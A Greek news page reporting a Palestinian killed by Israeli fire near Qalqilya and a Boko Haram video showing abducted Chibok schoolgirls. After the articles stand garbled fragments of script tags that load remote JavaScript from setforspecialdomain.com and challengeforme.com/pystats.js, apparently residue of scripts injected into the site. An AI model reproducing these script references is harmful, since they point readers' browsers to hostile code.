Ακόμα ένας νεκρός Παλαιστίνιος από ισραηλινά πυρά, στη Δυτική Όχθη – Σοκ με τις μαθήτριες που απήγαγε η Μπόκο Χαράμ

Νεκρός από ισραηλινά πυρά έπεσε σήμερα ένας 24χρονος Παλαιστίνιος σε συγκρούσεις που ξέσπασαν στην κατεχόμενη Δυτική Όχθη, ανέφεραν το παλαιστινιακό υπουργείο Υγείας και το επίσημο πρακτορείο Wafa.

Ο ισραηλινός στρατός τόνισε ότι ελέγχει αναφορές για έναν νεκρό Παλαιστίνιο σε ένα χωριό κοντά στην Καλκιλίγια, όπου ένας αριθμός Παλαιστινίων εκτόξευε πέτρες ενάντια σε στρατιώτες που είχαν επέμβει για να διαλύσουν ταραχές, χρησιμοποιώντας πραγματικά πυρά.

Ο Άχμαντ Σαλίμ, που σκοτώθηκε στο χωριού Τζαγιούς κοντά στην πόλη Καλκιλίγια στη βόρεια Δυτική Όχθη, είναι ο 17ος Παλαιστίνιος που χάνει τη ζωή του σε διαδηλώσεις και συγκρούσεις μεταξύ Παλαιστινίων και ισραηλινών δυνάμεων στη Λωρίδα της Γάζας και τη Δυτική Όχθη που πυροδοτήθηκαν έπειτα την αναγνώριση από τον Αμερικανό πρόεδρο Ντόναλντ Τραμπ της Ιερουσαλήμ ως πρωτεύουσας του Ισραήλ, την 6η Δεκεμβρίου.

Ένας Ισραηλινός δολοφονήθηκε στη Δυτική Όχθη το ίδιο χρονικό διάστημα.

Χθες Κυριακή, ο πρόεδρος της Παλαιστινιακής Αρχής Μαχμούντ Αμπάς δήλωσε πως η «συμφωνία του αιώνα», που έχει δηλώσει ότι επιδιώκει ο Ντόναλντ Τραμπ για την επίλυση του Μεσανατολικού αποτελεί στην ουσία το «χαστούκι του αιώνα», διαμηνύοντας ότι οι Αμερικανοί δεν είναι πλέον σε θέση να διαδραματίσουν ρόλο μεσολαβητή στην ειρηνευτική διαδικασία μετά την απόφαση Τραμπ για την Ιερουσαλήμ.

 

Σοκ με τις μαθήτριες που απήγαγε η Μπόκο Χαράμ

Βίντεο – σοκ με τις μαθήτριες που απήγαγε η Μπόκο Χαράμ

«Με τη χάρη του Θεού, δεν θα γυρίσουμε ποτέ πίσω», δήλωσε ένα από τα κορίτσια

Η μαχητική ισλαμιστική οργάνωση Μπόκο Χαράμ έδωσε σήμερα στη δημοσιότητα ένα βίντεο στο οποίο φέρεται να εμφανίζονται κάποια από τα κορίτσια που απήγαγε από τη βορειοανατολική πόλη Τσιμπόκ το 2014.

Από τα περίπου 270 κορίτσια που απήχθησαν από το σχολείο τους, περίπου 60 κατάφεραν να διαφύγουν λίγο μετά ενώ άλλα έχουν αφεθεί ελεύθερα έπειτα από διαμεσολάβηση. Περίπου 100 παραμένουν αιχμάλωτα.

Μια ομάδα περίπου 12 κοριτσιών, μερικά από τα οποία κρατάνε μωρά στην αγκαλιά τους, εμφανίζονται στο διάρκειας 21 λεπτών βίντεο όπως αναφέρει το Αθηναϊκό Πρακτορείο Ειδήσεων.

«Είμαστε τα κορίτσια του Τσιμπόκ. Είμαστε εκείνα από τα οποία ζητάτε να γυρίσουμε πίσω. Με τη χάρη του Θεού, δεν θα γυρίσουμε ποτέ πίσω», δήλωσε ένα από τα κορίτσια.

Ο Αμπουμπάκαρ Σεκάου -ο ηγέτης μίας από τις παρατάξεις της οργάνωσης- εμφανίζεται επίσης στο βίντεο, το οποίο απέκτησε η δημοσιογραφική ιστοσελίδα, με έδρα τις ΗΠΑ, Sahara Reporters.

Τον περασμένο Μάιο, η Μπόκο Χαράμ αντάλλαξε 82 κορίτσια έπειτα από μεσολάβηση έναντι χρημάτων για τους αντάρτες και αποφυλάκισης κάποιων από τα ανώτερα στελέχη της. Προηγουμένως, 24 κορίτσια αφέθηκαν ελεύθερα ή εντοπίστηκαν το 2016.

Η Μπόκο Χαράμ έχει σκοτώσει περισσότερους από 20.000 ανθρώπους και έχει αναγκάσει άλλα δύο εκατομμύρια να εγκαταλείψουν τις εστίες τους σε μια εξέγερση που ξεκίνησε το 2009 με σκοπό τη δημιουργία ενός ισλαμικού χαλιφάτου. Οργανώσεις βοήθειας υποστηρίζουν πως οι μαχητές απήγαγαν χιλιάδες ενήλικες και παιδιά και ότι πολλές από τις περιπτώσεις αυτές δεν έχουν λάβει τη δέουσα προσοχή.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>

Leave a Reply

Your email address will not be published. Required fields are marked *

*